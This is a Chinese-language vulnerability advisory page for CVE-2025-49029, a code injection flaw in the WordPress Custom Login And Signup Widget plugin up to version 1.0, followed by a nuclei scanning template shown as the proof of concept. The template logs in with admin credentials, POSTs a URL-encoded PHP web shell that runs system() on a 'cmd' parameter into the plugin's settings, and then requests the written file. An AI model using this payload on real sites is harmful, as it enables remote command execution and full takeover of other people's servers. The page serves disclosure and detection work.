WordPress Custom Login And Signup Widget Plugin 代码注入漏洞

漏洞信息

漏洞名称: WordPress Custom Login And Signup Widget Plugin 代码注入漏洞

漏洞编号:

  • CVE: CVE-2025-49029

漏洞类型: 代码注入

漏洞等级: 高危

漏洞描述: WordPress Custom Login And Signup Widget插件是一款用于WordPress网站的登录和注册小工具插件,广泛应用于需要自定义登录和注册页面的WordPress网站中。该插件允许网站管理员通过简单的配置,为网站添加自定义的登录和注册功能,提升用户体验。然而,该插件在1.0及之前版本中存在一个代码注入漏洞,攻击者可以利用此漏洞在服务器上执行任意代码。

漏洞的根源在于插件对用户输入的控制不当,未能正确过滤或转义用户提交的数据,导致攻击者可以通过构造恶意的HTTP请求,将任意PHP代码注入到服务器上。具体来说,攻击者可以通过向/wp-admin/options-general.php页面发送特制的POST请求,将恶意代码写入插件的配置文件中,随后通过访问特定的URL触发这些代码的执行。

此漏洞的影响极为严重,攻击者可以利用它在受影响的服务器上执行任意命令,可能导致网站被完全控制、数据泄露或其他恶意活动。由于攻击者需要先通过登录验证才能利用此漏洞,因此漏洞的利用需要一定的前提条件。然而,一旦攻击者获得了有效的管理员凭证,他们可以轻松地利用此漏洞进行攻击。因此,所有使用该插件的WordPress网站管理员都应尽快更新到最新版本,以避免潜在的安全风险。

产品厂商: bitto.Kazi

产品名称: Custom Login And Signup Widget

影响版本: <= 1.0

来源: https://github.com/projectdiscovery/nuclei-templates/blob/23e3ac410edbc265914cc29560a8c643981f67e6/http%2Fcves%2F2025%2FCVE-2025-49029.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

id: CVE-2025-49029

info:
  name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0
  reference:
    - https://github.com/Nxploited/CVE-2025-49029
  tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Referer: {{BaseURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 121
        Origin: {{BaseURL}}
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1
        Priority: u=0, i

        text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

      - |
        GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - contains(body_2, "custom-login-and-signup-widget")
          - status_code_3 == 500
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #代码注入
WordPress Custom Login And Signup Widget Plugin 代码注入漏洞
http://example.com/2025/07/22/github_2444695831/
作者
lianccc
发布于
2025年7月22日
许可协议